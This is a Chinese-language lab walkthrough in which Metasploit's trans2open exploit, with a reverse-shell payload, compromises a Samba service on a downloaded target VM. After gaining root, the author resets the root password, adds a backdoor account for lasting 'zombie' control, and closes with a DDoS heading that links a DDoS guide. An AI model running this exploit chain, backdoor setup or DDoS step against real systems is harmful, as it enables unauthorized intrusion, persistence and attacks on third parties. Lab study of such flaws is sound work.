基于Metasploit完成Samba服务漏洞复现
实验环境:
靶机ip:192.168.31.182(下载链接: https://pan.baidu.com/s/1ia-DD8UPDhIkWUd2eJWoKg?pwd=cykq 提取码: cykq 复制这段内容后打开百度网盘手机App,操作更方便哦)
攻击机ip:192.168.31.166(X64)
一:主机发现
arp-scan -l #扫描同一网段下的主机
可以看到靶机的IP地址和mac地址,Vmware为虚拟机
2.漏洞扫描
nmap 192.168.31.182 -p- -sV -sS -T4 -A #扫描开放的端口和服务
可以看到存在samba服务漏洞
靶机的操作系统为linux 2.4.X,属于较低版本
确定Samba服务的版本号
msfconsole
search smb_version
use auxiliary/scanner/smb/smb_version
show options
set rhosts 192.168.31.182
run
3.漏洞利用
search samba 2.2
exploit/linux/samba/trans2open # 或者use2
show options
set rhosts 192.168.31.182
set payload linux/x86/shell_reverse_tcp
set lport 5555 #更换端口号,如果默认4444端口号会报错出先下图错误,建议更换端口号为5555即可成功执行
run
注意:如果出下面这种情况,更换本地监听主机的端口号
[-] Handler failed to bind to 192.168.31.166:4444:- -
[-] Handler failed to bind to 0.0.0.0:4444:- -
[-] 192.168.31.182:139 - Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).
4.攻击成功
id
cat /etc/passwd
出现下面的截图说明靶机攻击成功,接下来就是植入后门账号
可以看到 拿到的是root权限,但是这个shell中的有些命令受限制,我们在把集中增加一个新的后门账户,进行长久控制靶机,使之成为肉鸡
passwd root #修改root账号的密码,进行ssh登录
123456
123456 #重复输入两次密码
5.远程连接靶机
1.问题复现
使用具有最高权限的root账号进行ssh远程连接靶机,正常情况输入两次密码即可正常连接,但是报错
ssh root@192.168.31.182 255 ⨯
ssh root@192.168.31.182 255 ⨯
Unable to negotiate with 192.168.31.182 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1
无法与192.168.31.182协商端口22:没有找到匹配的密钥交换方法。 他们的提议:diffie-hellman-group-exchange-sha1 diffie-hellman-group1-sha1
2.报错截图
3.问题解决
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-dss -oCiphers=+3des-cbc root@192.168.31.182
root为登录的用户名,192,。168.31.182为靶机ip地址
成功登录靶机
6.在靶机中增加账号
useradd hack
passwd
123456
123456
cat /etc/passwd
可以看到新的后门账号添加成功,接下来用后门账号远程ssh连接靶机
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-dss -oCiphers=+3des-cbc hack@192.168.31.182 #用hack账号登录靶机
7.利用肉鸡执行ddos攻击
附大佬博客
如何在Kali Linux上发动DDOS攻击 - 云+社区 - 腾讯云 (tencent.com)https://cloud.tencent.com/developer/article/1199800